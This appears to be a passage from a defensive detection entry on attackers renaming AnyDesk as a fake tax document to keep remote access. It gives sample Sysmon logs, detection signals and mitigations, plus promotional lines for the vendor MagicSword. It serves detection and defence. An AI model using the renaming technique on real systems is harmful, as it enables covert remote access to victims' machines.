Mitigation: Patch RMM platforms promptly; restrict RMM management interfaces from internet exposure.
- Bypass: Portable executable delivery (no installation required, bypasses software install controls)
Mitigation: Block unsigned or unapproved portable executables via application control and monitor Downloads/Temp for executable
creation.
RawLogs:
- Type: Sysmon
EventId: 11
Source: Microsoft-Windows-Sysmon/Operational
Description: Renamed RMM binary dropped to Downloads folder by browser process
MatchedRules:
- Hunt
- Analyst
Sample: 'EventID: 11 (FileCreate)
UtcTime: 2024-10-15 09:34:12.881
ProcessGuid: {c3d4e5f6-3456-7890-cdef-012345678901}
ProcessId: 3284
Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
TargetFilename: C:\Users\jsmith\Downloads\tax-document-2024.exe
CreationUtcTime: 2024-10-15 09:34:12.881
# Browser drops .exe directly to Downloads. Combined with execution signals Hunt/Analyst rules
'
- Type: Sysmon
EventId: 1
Source: Microsoft-Windows-Sysmon/Operational
Description: Renamed RMM binary executed. OriginalFilename mismatch is the Analyst signal
MatchedRules:
- Research
- Hunt
- Analyst
Sample: 'EventID: 1 (Process Create)
UtcTime: 2024-10-15 09:34:28.103
ProcessGuid: {c3d4e5f6-3456-7890-cdef-012345678902}
ProcessId: 9876
Image: C:\Users\jsmith\Downloads\tax-document-2024.exe
OriginalFileName: AnyDesk.exe
CommandLine: "C:\Users\jsmith\Downloads\tax-document-2024.exe"
CurrentDirectory: C:\Users\jsmith\Downloads\
ParentProcessId: 3284
ParentImage: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
FileVersion: 8.0.8.0
Description: AnyDesk
Company: AnyDesk Software GmbH
# KEY SIGNAL: Image=tax-document-2024.exe but OriginalFileName=AnyDesk.exe
# File signer: AnyDesk Software GmbH certificate on a file named "tax-document-2024.exe"
'
- Type: Sysmon
EventId: 3
Source: Microsoft-Windows-Sysmon/Operational
Description: Renamed AnyDesk binary connects to AnyDesk relay infrastructure
MatchedRules:
- Analyst
Sample: 'EventID: 3 (NetworkConnect)
UtcTime: 2024-10-15 09:34:29.441
ProcessGuid: {c3d4e5f6-3456-7890-cdef-012345678902}
ProcessId: 9876
Image: C:\Users\jsmith\Downloads\tax-document-2024.exe
User: CORP\jsmith
Protocol: tcp
Initiated: true
SourceIp: 10.10.5.22
SourcePort: 51876
DestinationIp: 195.201.29.30
DestinationHostname: relay.anydesk.com
DestinationPort: 443
# Non-RMM-named binary connecting to relay.anydesk.com within 2 min of browser download
'
EmulationScript:
File: emulation/renamed-rmm-tools/emulate.ps1
Language: powershell
Description: Simulates renamed RMM binary drop, execution with metadata mismatch, and outbound connection
SafetyNotes: Run in isolated lab VM only. Uses a benign Windows binary renamed to a campaign filename.
AtomicRef: T1219.002
TheConstant: Browser download → renamed signed binary execution → persistent RMM C2 connection
PreventionSummary: >
Restricting which RMM tools are permitted to run on endpoints breaks the C2 persistence phase
before it starts. Signer-based and inventory-based allow rules catch renamed binaries that
bypass filename controls, because the vendor signature is preserved regardless of the filename.
PreventionOpportunities:
- Category: Endpoint · Application Control
Control: Block RMM tools not on your authorized inventory
Impact: Stops C2 session establishment regardless of which tool or rename trick is used.
MagicSwordFit: MagicSword maintains a live, threat-intelligence-backed inventory of 100+ RMM tools
and blocks unauthorized ones by default - updated every 2 hours as new tools are weaponized.
MagicSwordTag: rmm-abuse
- Category: Endpoint · Application Control
Control: Enforce signer-based allow rules for remote access software
Impact: Catches binaries renamed to appear as invoices or installers, because the original vendor
signature is preserved and verifiable regardless of the filename.
MagicSwordFit: MagicSword's signer-based policy blocks any RMM binary not explicitly approved,
even when renamed or placed in an unexpected path.
MagicSwordTag: rmm-abuse
- Category: Network
Control: Alert on new outbound connections to unlisted RMM infrastructure domains
Impact: Contains C2 persistence even if the binary executes past endpoint controls; limits the
attacker's ability to maintain access after the initial session.